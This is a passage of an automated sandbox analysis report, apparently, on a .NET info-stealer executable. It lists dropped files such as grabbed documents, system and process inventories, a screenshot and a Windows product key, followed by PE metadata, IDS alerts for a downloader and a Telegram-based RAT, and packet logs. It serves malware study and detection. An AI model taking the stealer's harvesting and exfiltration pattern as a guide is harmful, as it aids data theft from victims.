Preview:	UQMPCTZARJFQTUFASTDSOZFLYRXCRKHVOJHYEKAKSJUWEVRKEEHCHPKWPEGNZIZTDIXUBUAFKBDOCCZIPOHGRBVURECWKRUQUOUYFYIUMHCIFKYDLKRSLRMQSZCCHCQTYCAJBIWSRLGLFHPRYQXSMIWVCULYKJGGGJCNVKWJYGBFHMFJLGDWHEBLVQELUPFAEDLGWLIYRFVOLPSGBOOWXATLCJBFUWTROEMRAMGOVEQKCNJFPARYQODRQVWJREDFQAVFXAXQUOFYBKAVYLFWLISVPMAMBKXYNIIHLYGICEPIHLCYULQSUQZMQKWUNRLOBKCTUXYPCLEGWBFUUBSLTLMIAZTIZRCKCPGPOVEVGCNQALQWJUZEWEADOUEECTWCPQBABNXRHBMDCYFWKNTJULTLPELWGANIENXFHRZEDIRITPFUKUVDJJESKDCFVNLQNVDGTOJWCJOOMJDRVLILHRTYJGMUSKTYLJBJFFGYGHLNSJODHZPIYPTJXFEFSYAIBKVTHVGOHNGUYSJLROXGPTNXNEWDYRXSJKDLQCESKVDPTEPJXQSQOGVLGWSHODSNVEQXEBIBZBQDZCRLBLSLYYTZYPCEUWJBUFRIBPYBIJXURCOFBVAMUHYFLJNDCOVIRXBJWRKSMZCWZGUZGAKJMWNQZHQWDXQHBUSCRBGZJEEYRZKNPKEDMWSRIUSWEVSCEYMGSRPFIWGTSTAGTIZVOURKQAHNNKNZFCYOYDNXQRFUDYBZZQRBAIHULYWRSSDCNGYITPPSJJVESDGBSDCPARCPYYFLZFKGRVGMHERPXKDGRXBVCFAMWFQLPZRHVNCIGTHLJYYNMXFTWOKFUGHHVLMJIAPDXBPZWJQADSYARMTUGFGYSOWKFOWTTHRMVDZYEOBJOMCEBCNXURWARWUVMREPQLASVZYXMGMQSSAZYVJXBROVGKGAVIGJWDLFJTASGHWAVHMWWBTHBBULSSCYTUPRYPVAEMBCREUGEJPA

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XQACHMZIHU.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\System\Apps.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1446
Entropy (8bit):	5.407572469297613
Encrypted:	false
SSDEEP:	24:OKkf6JgXJ/lf3Jgd/5f6JgnQPUCddMfoHJTl5mfFKJTlNg8OfpJTlmfNJeikpqPm:lkf6JgXBlf3JgN5f6JgQPxdSfmJZwfFR
MD5:	CEE54E135C6B81CDEAA9DFD5EA03C478
SHA1:	AF1F82275F492BCAD22E069E85CCD3E0F2FC2B56
SHA-256:	0766F4E7D7D88AF7F4EAE72FAD244BFDA8CFB0CA978CE238F321ACE705BF378F
SHA-512:	F83AB89E6E68AB57AB50B278F9CFFC3F9D3FA86B692A3495070BFD29C06A2A25B89E8E40AEE48C11264C1F945079062F6B24A1EEA805DEB2916D388BBE3E92B0
Malicious:	false
Preview:	.APP: Office 16 Click-to-Run Extensibility Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008C-0000-0000-0000000FF1CE}...APP: Office 16 Click-to-Run Extensibility Component 64-bit Registration..VERSION: 16.0.16827.20056..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-00DD-0000-1000-0000000FF1CE}...APP: Office 16 Click-to-Run Licensing Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008F-0000-1000-0000000FF1CE}...APP: Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532..VERSION: 14.36.32532..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {0025DD72-A959-45B5-A0A3-7EFEB15A8050}...APP: Java 8 Update 381..VERSION: 8.0.3810.9..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {77924AE4-039E-4CA4-87B4-2F32180381F0}...APP: Adobe Acrobat (64-bit)..VERSION: 23.006.20320..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {AC76BA86-1033-1033-

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\System\Desktop_20241129_081141.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	72513
Entropy (8bit):	7.79661141010461
Encrypted:	false
SSDEEP:	1536:CJD8j2RRK3Q3b08EpdhAiC9DNCBsZiT2NpYMembZq2zlJp//UGBmI:w8jkRKl8EPh0DlNpYmFquN/bB1
MD5:	99E6E7A1FA37E9BC4AD8DAFA134F2839
SHA1:	2BEDCEF9802236EDC8320AD22370DE30BBF111D5
SHA-256:	F66304E108596CDBEE1D905AF3C916DAE7674F640CA982197D3563D03ADAF495
SHA-512:	E5A571D80EB525F9EB7ECAA5327998C9EC8A11F993E96DEEF9FDEFB230858D5FEECE8691E5DC401C77347DCA89E48595441321E6704F4E99B32EA531FE18F4EF
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\System\Info.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	510
Entropy (8bit):	5.415726386099084
Encrypted:	false
SSDEEP:	12:RFNbwPRbVkb26txa2YFPjtszJxsWWvdUXyR:3VwP/kbltxaRFPjtQJxsWdS
MD5:	5FDF33DEC8C58655863F67032BE30F99
SHA1:	B64650280CDCB0A5FB69BC4D9A0D2081B985FED9
SHA-256:	C553456D4552B174ABBDFFB06BBEC15DA63024988181DF6F57029D671EE647ED
SHA-512:	78F035F96C2064A656435DDEC8BB502073CCD1E5EF03873F6D96E324575BD2EBFDD68DBC5C2D51CD5E9F490C29AA3D659D2061E58FFAC6FD98877EF9AAB949F9
Malicious:	false
Preview:	.[IP].External IP: 8.46.123.228.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 767668.System: Microsoft Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: MKU_6MO7.RAM: 4095MB.DATE: 2024-11-29 6:28:02 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (100%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Processes: False.Hosting: False.Antivirus: Windows Defender.

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19195
Entropy (8bit):	5.654311145908276
Encrypted:	false
SSDEEP:	96:ofMnaT8eMuplexN+E0N/SIwZ0bHO23KvgrcHzIhiJa0nlmuUAagt0lebE+7Bh89a:faT9a3Q0QpgNbEyftGCItQ61rNrttV2
MD5:	84AC56748A5C94F80C5584D762A4F8C1
SHA1:	05BCFCD8EB5CFA39A14A808BD801BCFDDCE758D4
SHA-256:	48D4E535781C3AB83C688CB75F2D80353444765B5383C17682237EC8CF459CD5
SHA-512:	5940B0438EC6881DA506AB0E1EE1E3BF396523C87831DD8898C4828A872ECEFFC67C9041CF8C9304ED2885591785DDA71072474E921C0E2EB6A5E72AC5AFA365
Malicious:	false
Preview:	NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: LAeqRxOBJmsENLLh..PID: 6460..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..PID: 3872..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..PID: 1716..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: RuntimeBroker..PID: 4732..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: csrss..PID: 420..EXE: ..NAME: svchost..PID: 3512..EXE: ..NAME: svchost..PID: 5152..EXE: C:\Windows\system32\svchost.exe..NAME: LAeqRxOBJmsENLLh..PID: 3856..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: svchost..PID: 1700..EXE: C:\Windows\system32\svchost.exe..NAME: LAeqRxOBJms

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	3.9345304886308483
Encrypted:	false
SSDEEP:	3:d9nfcuya1v:/nfb/R
MD5:	D53F696DA4D5A07686DB314ECD4D8F2F
SHA1:	29272E543C899DC8F79F506393E503C4F1DA1E36
SHA-256:	00B8A77D48EE5D71F020EEFEBD7E4FFAC627154B290AB0DD3D7BDCB1BD0E3D2D
SHA-512:	0B880E3B245B2DEF0B38D72460FFAEDE2389C71B3A0BBA19C233BB9DE037B73B6E72CC7D1D799DE35F30FBD71F6BD95C1E96571E4BEC8B7354A68AA4846ABC78
Malicious:	false
Preview:	H97XB-YN8RK-VKXC7-RPTQQ-2786P-7

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.585408769867356
Encrypted:	false
SSDEEP:	96:W3En1qUWhNWjlc8a3SOsjskcvpP4uRAW8AUcDK9GVPKqFgZormpS+/FhbZLZ+izl:Z6c8G
MD5:	2DA73AD45A382AA728C4FDE7932109BD
SHA1:	4553CADC39235E69EE2315AEB097A029953E2AA5
SHA-256:	B197D5E320C9085CE9F4A13A6E27614A101E844C3E271DF84A696125AADED0EE
SHA-512:	203DBA86D0574B48DDF8BDECC98793C17490BBD0D01367F206F3511433C51F195703C2BF7E9B8D793C302D23F02DC13B52DE3B5F495CED01D1B6CE1263448888
Malicious:	false
Preview:	NAME: LAeqRxOBJmsENLLh..TITLE: New Tab - Google Chrome..PID: 6460..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..TITLE: New Tab - Google Chrome..PID: 3872..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..TITLE: New Tab - Google Chrome..PID: 1716..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..TITLE: New Tab - Google Chrome..PID: 3856..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..TITLE: New Tab - Google Chrome..PID: 1268..EXE: C:\Program Files (x86)\IwQeqhLzWOmNhlMKtzUrGXuAELYviSWPTxhCAYzLYSOzMWlznzgaQfmPCzxmlsGQvWEFkdGLzPEOk\LAeqRxOBJmsENLLh.exe..NAME: LAeqRxOBJmsENLLh..T

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\msgid.dat

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:c:c
MD5:	45C48CCE2E2D7FBDEA1AFC51C7C6AD26
SHA1:	0ADE7C2CF97F75D009975F4D720D1FA6C19F4897
SHA-256:	19581E27DE7CED00FF1CE50B2047E7A567C76B1CBAEBABE5EF03F7C3017BB5B7
SHA-512:	0DC526D8C4FA04084F4B2A6433F4CD14664B93DF9FB8A9E00B77BA890B83704D24944C93CAA692B51085BB476F81852C27E793600F137AE3929018CD4C8F1A45
Malicious:	false
Preview:	9

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.5991860770036785
Encrypted:	false
SSDEEP:	3:hYF8AgARcWmFsFJQZaVy:hYF/mFSQZas
MD5:	471500D11DAF370CB75C597A4B1A7654
SHA1:	1AC2D4BDA1A30E09287F680C2AD75C577B096898
SHA-256:	C751BAFF37E4DC361F2C77BCC6B356159CC6178D1642244CBCD764A8DDE409B9
SHA-512:	DB81C5CE33D78E5618F41738129B5E623300CEFF188D99E7173E4E524107EEDED4C3BE2F15AC4715D3D10EAC23E39841978BBD42326E5C4E016A2B938C37A855
Malicious:	false
Preview:	..Waiting for 2 seconds, press CTRL+C to quit ....1.0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.974864816591682
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	uyz4YPUyc9.exe
File size:	3'748'352 bytes
MD5:	49a803ae133197c359ee1460f65370af
SHA1:	18b66a5751773934256fa698f1cefbf5e522464c
SHA256:	0382fe4590a7ed87d9edaeb970a5322d8e0c9c44f1f6b9f2528b5a3668755e3d
SHA512:	75f64a19c1761bff5524c8dfeeb9635b02e431082023f381a0cdeca0cb970a72f8dea56e1bff6c295c9ff207556a1f7f1991c78942731a0ab286e35abd76d4c7
SSDEEP:	98304:MkqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13:MkSIlLtzWAXAkuujCPX9YG9he5GnQCAo
TLSH:	EB06234077F4065AE5FF6E78F87122109E367A179436DB4C1998208C0FB2B85ED26BB7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0...9.............. ....@...... .......................`9...........`...@......@............... .....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x394000	0x1228	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3939f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x391a0c	0x391c00	f68f3141843b25ed6b6cc193a67aaba6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x394000	0x1228	0x1400	0bbbc31fdf68ff984f237f8ea19f1735	False	0.3568359375	data	4.832740054505843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x394090	0x348	data			0.43214285714285716
RT_MANIFEST	0x3943e8	0xe3b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.38649464726873456

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-29T12:28:14.551619+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49712	104.16.184.241	80	TCP
2024-11-29T12:28:23.457086+0100	2029323	ET MALWARE Possible Generic RAT over Telegram API	1	192.168.2.5	49724	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 12:28:04.947458982 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.947515011 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.947591066 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.950257063 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.950315952 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.950365067 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.952558994 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.952609062 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.952650070 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.952666998 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.952682018 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.952735901 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.964040995 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.964050055 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.964109898 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.964128017 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.964138031 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.964184999 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.971930981 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.971932888 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.971946001 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.971949100 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.973598003 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.973615885 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.974073887 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.974087954 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.975076914 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.975086927 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:04.975322008 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:04.975331068 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.191452026 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.191456079 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.191560984 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.191622972 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.197457075 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.197469950 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.197699070 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.197707891 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.197889090 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.198031902 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.236030102 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.236124992 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.236175060 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.236255884 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.237665892 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.237672091 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.238246918 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.238257885 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.238399982 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.238411903 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.238504887 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.238655090 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.257941961 CET	49707	443	192.168.2.5	185.199.108.133
